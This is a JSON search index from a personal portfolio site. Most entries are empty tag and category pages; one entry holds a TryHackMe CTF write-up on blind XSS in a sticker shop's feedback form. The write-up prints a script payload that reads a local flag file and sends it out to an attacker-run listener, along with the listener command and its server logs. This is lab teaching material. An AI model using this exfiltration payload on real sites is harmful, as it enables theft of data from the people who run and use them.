[{"content":"","date":"24 April 2026","externalUrl":null,"permalink":"/posts/blogs/","section":"Posts","summary":"","title":"Blogs","type":"posts"},{"content":"Sample content 1\n","date":"24 April 2026","externalUrl":null,"permalink":"/posts/blogs/magic-bytes/","section":"Posts","summary":"","title":"Magic Bytes in Files","type":"posts"},{"content":"","date":"24 April 2026","externalUrl":null,"permalink":"/posts/","section":"Posts","summary":"","title":"Posts","type":"posts"},{"content":"","date":"24 April 2026","externalUrl":null,"permalink":"/","section":"Saptarshi's Portfolio","summary":"","title":"Saptarshi's Portfolio","type":"page"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/tags/async-await/","section":"Tags","summary":"","title":"Async-Await","type":"tags"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/tags/blind-xss/","section":"Tags","summary":"","title":"Blind-Xss","type":"tags"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/tags/fetch-api/","section":"Tags","summary":"","title":"Fetch-Api","type":"tags"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/tags/rce/","section":"Tags","summary":"","title":"Rce","type":"tags"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":" Introduction # Difficulty: Easy Time: 120 mins Your local sticker shop has finally developed its own webpage. They do not have too much experience regarding web development, so they decided to develop and host everything on the same computer that they use for browsing the internet and looking at customer feedback. 
Smart move!\nCan you read the flag at http://10.49.171.129:8080/flag.txt?\nExploring the website # From the intro text, it is obvious that the webserver is on port 8080. Open it up in the browser and we are greeted with a sticker shop landing page.\nUpon further exploring, we come across a feedback page where users can provide feedback.\nThis could potentially lead to XSS (cross-site scripting). Let's check for the most basic XSS exploit.\n<script>alert(1);</script>\nOn submitting it, nothing really happened; just a thank-you message appeared.\nSo our little script tag did not get executed, or else we would have seen a pop-up box with 1 in it. To test whether our code really gets executed or not, we use fetch.\nBefore that, open up a terminal and set up your listening server. It opens port 1337 and listens for incoming connections (more precisely, incoming HTTP requests).\n$ python3 -m http.server 1337\nServing HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...\nNow our test payload.\n<script>fetch('http://192.168.139.54:1337')</script>\nThis IP is not your local IP. It is the IP assigned to you when you connect to TryHackMe's VPN.\nNow when you click Submit, you should see something like this in your terminal.\n$ python3 -m http.server 1337\nServing HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...\n10.49.171.129 - - [10/Apr/2026 10:35:27] \"GET / HTTP/1.1\" 200 -\nThis indicates that our payload did get executed (but on the server side, which is why we can't see the pop-up), and we can see a request made from the machine's IP to our server.\nExploit # We can weaponize this and read the flag.txt file. 
One thing to note: if we try to access the flag manually at http://10.49.171.129:8080/flag.txt, we get 401 Unauthorized.\nSo the final payload looks something like this:\n<script>\nasync function exfil() {\n  const resp = await fetch('http://127.0.0.1:8080/flag.txt');\n  const flag = await resp.text();\n  await fetch('http://192.168.139.54:1337?flag=' + flag);\n}\nexfil();\n</script>\nWhat's the need for async? The fetch API is asynchronous: fetch returns a Promise object rather than the response itself. So we need to await the Promise to get the HTTP response, and await is only allowed inside an async function.\nExplanation # exfil() is an async function because we have used fetch (and await) inside of it. To use await inside a function block, the enclosing function must be declared as async. It first fetches the flag locally. Since the code gets executed on the server, we can access the flag locally. It's just that hosts other than localhost can't access it. fetch returns a Promise, so we await it to get the actual server response in the resp variable. To get the flag, we await resp.text() and store the result in the flag variable. Then we just make a GET request to our attacker server containing the flag as a GET parameter. This way we can view the flag in the terminal as soon as the request is made. Then we just call the exfil() function (exfil stands for exfiltrate).\nClicking Submit, you should see something like this in the terminal:\n$ python3 -m http.server 1337\nServing HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...\n10.49.171.129 - - [10/Apr/2026 10:35:27] \"GET / HTTP/1.1\" 200 -\n10.49.171.129 - - [10/Apr/2026 10:47:17] \"GET /?flag=THM{REDACTED} HTTP/1.1\" 200 -\nThere you go! 
You have your flag!\n","date":"10 April 2026","externalUrl":null,"permalink":"/posts/thm-writeups/the-sticker-shop/","section":"Posts","summary":"","title":"The Sticker Shop - TryHackMe (Easy)","type":"posts"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/categories/thm-writeup/","section":"Categories","summary":"","title":"Thm-Writeup","type":"categories"},{"content":"","date":"10 April 2026","externalUrl":null,"permalink":"/posts/thm-writeups/","section":"Posts","summary":"","title":"TryHackMe Writeups","type":"posts"},{"content":"","externalUrl":null,"permalink":"/about/","section":"Saptarshi's Portfolio","summary":"","title":"About Me","type":"page"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"}]